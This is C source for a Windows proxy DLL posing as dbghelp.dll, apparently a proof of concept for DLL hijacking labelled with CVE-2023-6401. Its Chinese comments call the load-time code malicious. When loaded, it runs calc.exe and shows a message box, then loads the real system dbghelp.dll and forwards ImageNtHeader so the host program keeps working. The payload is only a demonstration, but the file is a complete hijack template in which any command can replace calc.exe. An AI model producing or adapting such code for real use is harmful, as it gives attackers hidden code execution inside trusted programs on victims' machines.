#include <windows.h>

typedef PIMAGE_NT_HEADERS (WINAPI *pImageNtHeader)(PVOID Base);

static HMODULE realDbghelp = NULL;
static pImageNtHeader realImageNtHeader = NULL;

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        {
            // 執行惡意程式碼
            WinExec("calc.exe", SW_SHOW);
            MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK | MB_ICONINFORMATION);

            // 載入系統真實 dbghelp.dll
            char systemPath[MAX_PATH];
            GetSystemDirectoryA(systemPath, MAX_PATH);
            strcat(systemPath, "\\dbghelp.dll");
            realDbghelp = LoadLibraryA(systemPath);

            if (realDbghelp)
            {
                realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
            }
        }
        break;
    case DLL_PROCESS_DETACH:
        if (realDbghelp)
        {
            FreeLibrary(realDbghelp);
        }
        break;
    }
    return TRUE;
}

// 轉發 ImageNtHeader 函式
__declspec(dllexport) PIMAGE_NT_HEADERS WINAPI ImageNtHeader(PVOID Base)
{
    if (realImageNtHeader)
        return realImageNtHeader(Base);
    return NULL;
}